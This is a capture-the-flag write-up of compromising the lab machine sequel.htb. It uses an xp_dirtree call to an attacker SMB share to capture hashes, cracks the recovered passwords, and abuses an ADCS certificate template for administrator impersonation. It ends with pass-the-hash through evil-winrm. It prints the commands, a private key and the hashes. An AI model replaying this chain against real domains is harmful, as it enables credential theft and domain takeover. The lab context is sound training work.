Shell as sql_svc

Anonymous SMB access is enabled

Username

[email protected]

Using impacket we can sign into the mssql server

impacket-mssqlclient sequel.htb/PublicUser:[email protected] 

Using this command below we can reach out to an external SMB share and use responder to capture the hash

sudo responder -I tun0

EXEC xp_dirtree '\\10.10.14.2\share'

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:7631d77ef1809e8e:C5DB46C039E1E3A9A05EE7AB4A53891E:010100000000000080A07C4B269CDA0192BCDF41A651E827000000000200080043004C003600480001001E00570049004E002D00380056004400440033005000560053004E0041004B0004003400570049004E002D00380056004400440033005000560053004E0041004B002E0043004C00360048002E004C004F00430041004C000300140043004C00360048002E004C004F00430041004C000500140043004C00360048002E004C004F00430041004C000700080080A07C4B269CDA01060004000200000008003000300000000000000000000000003000004A58C3ABFB960EE91E9C14995189622FE639D5D286C3D626E05574B54576F7640A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000

hash cracks to REGGIE1234ronnie

sql_svc:REGGIE1234ronnie

We have no user flag though, we need to pivot to Ryan.Cooper's account.

Shell as Ryan Cooper

We can find creds located in the error logs of mysql. Ryan accidently enters his password for user username.

C:\SQLServer\Logs> type ErrorLog.bak

ryan.cooper:NuclearMosquito3

Privilege escalation to admin

Using Certipy we can get the admin hash/TGT ticket

Tool is here - https://github.com/ly4k/Certipy

Guide is here - https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation

Also this was useful - https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

First step was uploading certify.exe to the box and running it to find vulnerable tickets. The important things we need are highlighted in red.

.\certify.exe find /vulnerable

Using the things highlighted in red we can generate a private key(cert.pem file)

.\certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEArRCH7YZMWIxt2n+Dv6PaP78GFpMZCxnfzrFj867/wjK8LuNC
dMIrIlKQJFOPGOUW1vpqsXX7wHevNhosejyzHrB/OhvR/SghLnpCjiCkfUzNkW4C
faX82fRbojAStCeo7+dR9u2gR9d2KUGEILlHI8gcuLOuOZ9h9DG0R81yNgShOCPi
QsPYgoDUtW0EvjYAz59IQKLGXO8rIm0i7Q6907/n1b16DRs0kZuThTOv4qxvjHDY
GRs3bbvMy9qXCVI5jGoSX8ogO9ituLy//9mulasde6+vs0h893pA6pAIYDWyeIp0
dgiAcanmQsBccQ/bmcQqTpnUEpktnEkyxm2igQIDAQABAoIBACACwMGkZ5axUthp
YZse2Y2U7bFbP/SXspfuo8g9BD2NWNVrX61tBMFyeArgEcXPCex1oSp14jz1Zkkh
ijyJ4a+5ga7j2nFy7MBGCO11CDfM7vEJYhiPjTdbRV+4eJ0uAMdvB/Aef9kJ92cm
ISRUYN4zc2yOf5lU669ZSjlFvOxUnQM9zGhUvfVWyyvEUInh7B354DcIdcfO94Q6
Zy91VhPr+olCWC6K6zAuKV+gtqrUk0RxFYqZISx2Z7PqCPU8mmwn0V34OBcz0he2
VGolxwtQceNDqj2eJKvb06Cwth9XQl7XSmgGn0kRT1L0IW87CTr6v5mOH6hAlE2H
+3EyiYkCgYEAzhr5E8IKAGVLyrfThXDxjMVef99FPQFXfoOUDjdaytMg/p4aKq+T
NC+WXS065FRd3F1y93VItvHWbPF305RhP8yHVXsSiuCIz+6xrgh8WtasGze6AvNm
IaYEV9JhAffzQxzdFG81AOiIT4E0E7hJDitnaMIH6bEcILhm1G9iSKsCgYEA1vXp
Y3iMxVvp41+6RFWe4hzLnNCFAt5irkjlmHNhIbuE97iHBdqSkQW0FXzNB/b8ofHz
kmxZwBoVWjqQyKAIVwkeuY+o99LuBH0JKrUMSnkasOwzOZVteulgokBtuu2dls47
WbScWdMIqR+qAspWW26zX1dQjIWN2Vu/YCGdWYMCgYEAk7iJZTvh5z6y/+yZUj8N
IZQkkwn3mi3oA+lSqI3MKSsBrvyqTIXiv7iL0OSmHRjK3TKtP+dz4oua4CKBe8gR
m6SAKyg2tgsQg9fUyaOTXZgXarqaO5swTFWtLzS+CqcoV6XMXuUF3EzNxg4YwTmI
Qvug9lh7S2eBfYItUX0zuFkCgYAO7V66qJll7x8Lyg7+Rc/Vtdgx2I0UCOtjXO6M
qp55IDN4nFjMAESjS3kY8OSwA+fBOzMF3P5Sh70p2d1KAUry+FAo5KAALaaXqzMi
wxXKaiR/Wren7QeAPIqYWc8E5xFFcqbOcOtWlYAJdohwzyo2CTbtjPur9m5GRMfC
XjM2DwKBgCT/TCAdQAt6hnW0ur/5u+gHnm9WkjJEr2htW8wV8bvEP9+zdZ7O8USf
FVt6yL6I8+rH0VBZEUO9Uy4no20zQKGS7lzrQSFOv1Bh52wNh8qpwW9dxWPy6AdK
Cnh9msFonc8oU2eyrIW4A+qBsEbqKmTJWqv47qi4085iC8Tz3Gej
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAABDRPCeEDofuoQAAAAAAEDANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjQwNTA0MDkwOTQ1WhcNMzQwNTAy
MDkwOTQ1WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtEIfthkxYjG3af4O/o9o/vwYW
kxkLGd/OsWPzrv/CMrwu40J0wisiUpAkU48Y5RbW+mqxdfvAd682Gix6PLMesH86
G9H9KCEuekKOIKR9TM2RbgJ9pfzZ9FuiMBK0J6jv51H27aBH13YpQYQguUcjyBy4
s645n2H0MbRHzXI2BKE4I+JCw9iCgNS1bQS+NgDPn0hAosZc7ysibSLtDr3Tv+fV
vXoNGzSRm5OFM6/irG+McNgZGzdtu8zL2pcJUjmMahJfyiA72K24vL//2a6Vqx17
r6+zSHz3ekDqkAhgNbJ4inR2CIBxqeZCwFxxD9uZxCpOmdQSmS2cSTLGbaKBAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZQIBBDApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFLdpfrxJajL18I8Scn8jm3n2+zLX
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEADu9nxoqEAQh9/tHLVjPMY4PPTIYmq5tVSt2gw4c/pIjeV9RGvRF8Qzy/
kh5oWNASILgn+HWhNxOodTJm6u4+gfS0qFWcgqLKdB4/wwGlEYkswIiULWUMR1h4
fT8NDMiCruNWmPo0rW0Vczvq1lAXkLeBJ4BGT5ti6yK6Q4kyHTQjMFvGNdYEuc6P
hI4m9lD6HD+r2SzWeKDdsi3ITGk/H5/uPrN7w4YEcIxSiBu2z2hS32L0Y9eI+lXI
EnT7TjfBwh7c/X58gcYHZyxuQYrp+4Pcb7HRQQ01yu14se5bFBAdeqCSkOt7oNei
RSQ7z+oJe//gBHsvW6F8KnGsoVtwSg==
-----END CERTIFICATE-----
 

We then copy that key to our machine and name it cert.pem and use the command below to turn it into a pfx file.

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Due to kerberos my time was different from the machine so we have to use ntupdate to make our times match up.

ntpdate 10.10.11.202

Now that its in the proper format and we have the proper time we can use certipy to give us the tgt and hash.

python3 entry.py auth -pfx 'cert.pfx' -username 'Administrator' -domain 'sequel.htb' -dc-ip 10.10.11.202
 

I spent a while trying to crack the ntlm hash or use a pass the hash tool but kept getting errors. Like usual i over complicated things a ton. We can just pass the hash with evil-winrm

evil-winrm -i 10.10.11.202 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee